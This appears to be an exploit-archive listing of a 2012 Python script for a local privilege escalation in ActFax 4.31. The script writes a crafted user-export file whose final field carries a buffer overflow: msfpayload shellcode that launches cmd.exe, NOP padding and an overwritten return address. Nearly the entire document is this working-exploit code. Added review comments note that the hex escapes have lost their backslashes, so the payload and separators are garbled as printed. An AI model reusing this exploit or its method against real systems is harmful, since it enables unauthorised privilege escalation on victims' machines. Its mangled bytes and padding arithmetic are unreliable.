
# Title : ActFax 4.31 Local Privilege Escalation Exploit
# Published : 2012-08-29
# Author :


#!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html

#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
# Payload string. Per the header above it was produced by msfpayload
# (windows/exec, CMD=cmd.exe) and encoded with x86/alpha_upper to 466 bytes.
# NOTE(review): in this listing the backslashes of the hex escapes have been
# lost ("x89" is three ASCII letters, not one byte), so as printed `sc` is
# plain text, its length does not match the 466 bytes quoted above, and the
# `502 - len(sc)` padding arithmetic below does not produce the intended layout.
sc = (
"x89xe5xdbxcexd9x75xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx5a"
"x48x4dx59x45x50x35x50x53x30x43x50x4dx59x4a"
"x45x56x51x48x52x55x34x4cx4bx36x32x50x30x4c"
"x4bx36x32x44x4cx4cx4bx30x52x52x34x4cx4bx34"
"x32x56x48x34x4fx38x37x51x5ax37x56x46x51x4b"
"x4fx46x51x39x50x4ex4cx47x4cx35x31x43x4cx43"
"x32x36x4cx31x30x49x51x48x4fx34x4dx55x51x58"
"x47x4ax42x4cx30x30x52x50x57x4cx4bx50x52x52"
"x30x4cx4bx37x32x47x4cx55x51x58x50x4cx4bx47"
"x30x33x48x4bx35x39x50x34x34x50x4ax33x31x4e"
"x30x30x50x4cx4bx57x38x52x38x4cx4bx36x38x51"
"x30x33x31x4ex33x4bx53x57x4cx57x39x4cx4bx56"
"x54x4cx4bx53x31x48x56x36x51x4bx4fx46x51x4f"
"x30x4ex4cx49x51x58x4fx54x4dx55x51x39x57x50"
"x38x4bx50x32x55x5ax54x53x33x43x4dx4bx48x47"
"x4bx33x4dx46x44x53x45x5ax42x36x38x4cx4bx30"
"x58x47x54x45x51x49x43x45x36x4cx4bx44x4cx30"
"x4bx4cx4bx36x38x55x4cx53x31x59x43x4cx4bx54"
"x44x4cx4bx55x51x48x50x4cx49x31x54x47x54x36"
"x44x51x4bx31x4bx55x31x36x39x31x4ax36x31x4b"
"x4fx4dx30x51x48x51x4fx50x5ax4cx4bx55x42x5a"
"x4bx4dx56x31x4dx52x4ax45x51x4cx4dx4dx55x4f"
"x49x45x50x53x30x53x30x46x30x42x48x36x51x4c"
"x4bx52x4fx4dx57x4bx4fx39x45x4fx4bx4ax50x4e"
"x55x39x32x31x46x55x38x59x36x4dx45x4fx4dx4d"
"x4dx4bx4fx58x55x57x4cx35x56x53x4cx44x4ax4d"
"x50x4bx4bx4dx30x52x55x55x55x4fx4bx37x37x35"
"x43x52x52x32x4fx43x5ax43x30x56x33x4bx4fx4e"
"x35x32x43x32x4dx45x34x46x4ex35x35x43x48x45"
"x35x33x30x41x41")

# Record layout written into the last column of the export file:
#   10 filler bytes | sc | filler up to 502 bytes | 4-byte return address | 6000 filler bytes
# The address comment on `eip` states it is a RETN inside actfax.exe, i.e. the
# overflow overwrites a saved return address rather than an SEH record (that
# is the author's claim; the page shows no crash analysis to confirm it).
# From a detection standpoint the distinguishing artifact is a user-export
# record whose final field is several thousand repeated identical bytes.
frontpad = "x90" * 10 
eip = "x22x1bx40x00"	#00401B22 RETN actfax.exe
backpad = "x90" * 6000
# Total size is fixed by the 502-byte slot plus the two pads regardless of
# the payload used, as long as len(sc) <= 502 (no check is made for a longer one).
buff = frontpad + sc + "x90" * (502 - len(sc)) + eip + backpad

# Write the crafted file to the current directory. The first row is a
# tab-separated list of ActFax user-export column names; the second row is
# "Mark as Read" followed by a CRLF and then the oversized record. The page does
# not show how this file is fed to ActFax, only that the issue is described as
# a local privilege escalation. Remediation is an updated ActFax build — the
# listing names no fixed version (vendor notified per the header).
# NOTE: the same stripped-backslash issue applies to the "t" and "x0dx0a"
# sequences here, so the tab and CRLF separators are also literal letters as
# printed. `with open(...)` would be the modern idiom for this open/close pair.
f = open("pwnag3.exp", "w")
f.write(
"User NametEntire User NametPasswordtAlias-NamestGrouptDirect DialingtCost AccounttPermissionstCommentstUser-Definedt"
"Predefined SettingstName 1tName 2tName 3tName 4tName 5tDepartmenttAttention oftPhone 1tPhone 2tFax NumbertE-Mailt"
"Coverpage Non-WindowstOverlay Non-WindowstCoverpage WindowstOverlay WindowstUser-DefinedtPrinter SettingstAutomatic Printing Outgoingt"
"Printer Name OutgoingtReport OutgoingtAutomatic Printing IncomingtPrinter Name IncomingtReport IncomingtNotification Outgoingt"
"Email OutgoingtNotification IncomingtEmail IncomingtAttach Original MessagetUser-Defined Archive SettingstExport Outgoingt"
"Export IncomingtExport-PathtMark as Readx0dx0a"+buff+"x0dx0a")
f.close()